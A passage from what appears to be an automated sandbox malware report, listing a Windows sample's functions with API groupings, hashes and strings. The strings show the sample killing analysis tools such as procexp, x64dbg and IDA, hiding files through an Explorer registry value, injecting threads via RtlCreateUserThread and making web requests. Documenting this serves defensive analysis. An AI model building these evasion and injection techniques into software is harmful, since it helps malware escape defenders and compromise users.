                                                                                                                                                                                                                        • Instruction ID: a6820cdf9ce15a6a8c0b401698fd5d9dbe60edd71cc43ae24126f3f9278a0fe1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02a68683b8a88d890b7632b1029efc6fd5a6036bd7126e420ffe44a182f27b57
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5ED01311F3494181E754E736E445715D260FBC4B44F90C039F58941954CF3CC095CF14

                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                        Function 00007FF78531216C Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF7853121A9
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                        • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                        • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                        • Opcode ID: fc41c48b696f2292e6165caa7080af249ce6d4eefb844c9705a23d0a02d259c6
                                                                                                                                                                                                                        • Instruction ID: 0a5b7c2413c558d7b5dec6be4933fd56cd252da630036f14b7c466e54a201516
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc41c48b696f2292e6165caa7080af249ce6d4eefb844c9705a23d0a02d259c6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A71E936568B8186EB509B65F45432AF760FBC4BA8FA01039FA8A47E68DF7CD444CB14
                                                                                                                                                                                                                        Function 00007FF7853110D8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: OpenProcess
                                                                                                                                                                                                                        • String ID: $@$RtlCreateUserThread$ntdll
                                                                                                                                                                                                                        • API String ID: 3743895883-721857904
                                                                                                                                                                                                                        • Opcode ID: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction ID: d08e143b253b53250fa1238b4c28488dc71b4aaeb54f8e7430721c6d8bd69e7b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 964a1747a43a5bc6213ff49be58aa8a5c6afce4450aa43907f5051e808605a2b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08712F3195CA8186E771EB64F4443AAF3A0F784B98FA04539E68D86F98DF7CD484CB50
                                                                                                                                                                                                                        Function 00007FF785313DF0 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1083639309-0
                                                                                                                                                                                                                        • Opcode ID: 7a16b558b3a5aabe8e9edc648b30ff0989d79b9dce4d7edaa0226f1c99cc9121
                                                                                                                                                                                                                        • Instruction ID: e358e67914c96aa4b15634389f6dda4e096aa158f0afde76df38ae89c644b902
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a16b558b3a5aabe8e9edc648b30ff0989d79b9dce4d7edaa0226f1c99cc9121
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A21033695CB8581E770AB21E84836AF361FBC4F68FA04238E55D439A8DF3DD445C714
                                                                                                                                                                                                                        Function 00007FF7853133A8 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Version
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1889659487-0
                                                                                                                                                                                                                        • Opcode ID: 9a3d8486ac2d39fccdaed0c0b86455d6507906c072e3d7f35381649f4f79c0a0
                                                                                                                                                                                                                        • Instruction ID: 8b11b45dfd412227ae420c2ed78f93b93163b2e9e8401d7e92366c94e4bb2c47
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a3d8486ac2d39fccdaed0c0b86455d6507906c072e3d7f35381649f4f79c0a0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F6F0AF31A6C141C2EA749A25A0083FAE6E0F749B6DFE00139E24D42A94DE3DD559CE25
                                                                                                                                                                                                                        Function 00007FF785311444 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: InfoSystem
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 31276548-0
                                                                                                                                                                                                                        • Opcode ID: fd4e5232eadf4f87905bec873136a68cde2c0ceb075ae6d8ef107053c4164afd
                                                                                                                                                                                                                        • Instruction ID: c2737f27c07b0cab9cbffade6ea4c272cd81fd45bb2a15d667277452f1011a7b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd4e5232eadf4f87905bec873136a68cde2c0ceb075ae6d8ef107053c4164afd
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48E06522A6C04582E7705730E504379A2F1F758FA8FE00535FA8DC2AD4EE2CCA50CB50
                                                                                                                                                                                                                        Function 00007FF785314530 Relevance: 25.7, APIs: 17, Instructions: 155memoryfileCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2693768547-0
                                                                                                                                                                                                                        • Opcode ID: 77a34d1da9b6139ca756fa0c259faa5e8e44d1f0fdd31c5d950aa5b7d4f57222
                                                                                                                                                                                                                        • Instruction ID: 9df9d92ea39d89931af5e7910379634e44f08531ef53733b3e6586b01f13f82a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77a34d1da9b6139ca756fa0c259faa5e8e44d1f0fdd31c5d950aa5b7d4f57222
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 57810C36618B8182EB50DB65F44436AF7A0FBC9BA4F604139EA8D87B68DF7CD045CB10
                                                                                                                                                                                                                        Function 00007FF785313078 Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF785314410: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7853130B3), ref: 00007FF785314458
                                                                                                                                                                                                                          • Part of subcall function 00007FF785314410: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7853130B3), ref: 00007FF785314495
                                                                                                                                                                                                                          • Part of subcall function 00007FF785314410: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7853130B3), ref: 00007FF7853144A0
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313B50: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7853130B8), ref: 00007FF785313B93
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313B50: RegSetValueExW.ADVAPI32 ref: 00007FF785313BC9
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313B50: RegCloseKey.ADVAPI32 ref: 00007FF785313BD8
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313BF0: RegDeleteKeyW.ADVAPI32 ref: 00007FF785313C08
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313DF0: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF785313E03
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313DF0: Process32FirstW.KERNEL32 ref: 00007FF785313E36
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313DF0: CloseHandle.KERNEL32 ref: 00007FF785313E48
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313DF0: wcscmp.MSVCRT ref: 00007FF785313E5D
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313DF0: OpenProcess.KERNEL32 ref: 00007FF785313E73
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313DF0: TerminateProcess.KERNEL32 ref: 00007FF785313E96
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313DF0: CloseHandle.KERNEL32 ref: 00007FF785313EA4
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313DF0: Process32NextW.KERNEL32 ref: 00007FF785313EB7
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313DF0: CloseHandle.KERNEL32 ref: 00007FF785313EC9
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313980: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF785313AD8), ref: 00007FF7853139B0
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 00007FF785313162
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                        • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                        • API String ID: 2853470409-928700279
                                                                                                                                                                                                                        • Opcode ID: 7025b17d87294329de3cc266a73b50fcb0614222f694bb80ca69dde199845389
                                                                                                                                                                                                                        • Instruction ID: a314e3ae8f1d160fe548854f994c826b0d3c2da4c9da4fa28c3fdf1933de5a27
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7025b17d87294329de3cc266a73b50fcb0614222f694bb80ca69dde199845389
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0B217620AB850291EA01F7B0E9A21B5E629BF50F78FF04139F41D43DE2DE6DE646C274
                                                                                                                                                                                                                        Function 00007FF785312E08 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID: rbNSpGEsyb
                                                                                                                                                                                                                        • API String ID: 299056699-189039185
                                                                                                                                                                                                                        • Opcode ID: 10555049a1e5e970aacc173f1715d106100e4f0dc8ec30993202ec39d8a78e4e
                                                                                                                                                                                                                        • Instruction ID: ed4045d3986a1ce56c03a4512e3eea1a26fbb1b2df1dc879c5ace3fbf69cecda
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10555049a1e5e970aacc173f1715d106100e4f0dc8ec30993202ec39d8a78e4e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3701AD2695CB0181EB30AB62E854229F760FB98FBDFA40539F94E42A74DE3CD585C624
                                                                                                                                                                                                                        Function 00007FF785312EA8 Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 299056699-0
                                                                                                                                                                                                                        • Opcode ID: 0ff44a8e6de8ed1e0195ea57690e214b8abe1ab05dd50aed0b9b1818bdfdce29
                                                                                                                                                                                                                        • Instruction ID: cd4686bfb8b06be622f1592d1a42007acc18a0580fe836a24f1deefd65072f4f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ff44a8e6de8ed1e0195ea57690e214b8abe1ab05dd50aed0b9b1818bdfdce29
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E01C02696CA4182E720AB71E854229F370FBC8F69FA00539F98E42A64CF3CD544C624
                                                                                                                                                                                                                        Function 00007FF785313CB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                        • String ID: Unknown
                                                                                                                                                                                                                        • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                        • Opcode ID: fdec89f59edf3eb6797727eaad360a689e09697676163aab672e6b7c8a7a61d1
                                                                                                                                                                                                                        • Instruction ID: 4374a5e9afab7e04c2e39d8fc86636ed542183076fa870dcf3a30246f155bc7d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fdec89f59edf3eb6797727eaad360a689e09697676163aab672e6b7c8a7a61d1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2431EA7661CBC485D770EB25E4983AAB3A0FB88B54F500239EA8D83B68DF3CD554CB10
                                                                                                                                                                                                                        Function 00007FF785313B50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                                                                                                        • String ID: Hidden$Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
                                                                                                                                                                                                                        • API String ID: 779948276-85274793
                                                                                                                                                                                                                        • Opcode ID: eeeb668cb3ebc31c330d6d5e78252b73bef579c735708216c362ce484c2523da
                                                                                                                                                                                                                        • Instruction ID: be7ee758265b3b9c8f4199881d0357c10b3df02c62237cd52a2c63865638448d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eeeb668cb3ebc31c330d6d5e78252b73bef579c735708216c362ce484c2523da
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90011736628B808AD7509B24E84471AB7A0F788BA8F901225FA8D43F68DF7CC145CB04
                                                                                                                                                                                                                        Function 00007FF7853113C4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: @$IsWow64Process$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-1447682865
                                                                                                                                                                                                                        • Opcode ID: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction ID: 0cdeff19218f9ed18d13ddfaf0345055a987ae10fc881c3ee8761b1ee21b045f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E01E12296C65286E631AB20E444369A7B0FB84BADFE04139E68D42954DF7CD559CF10
                                                                                                                                                                                                                        Function 00007FF785313FD0 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2850635065-0
                                                                                                                                                                                                                        • Opcode ID: 7ef93d6c8be03e0e8067038787ae35eedaf0d19a6d09eeffd0ee61b9360f4694
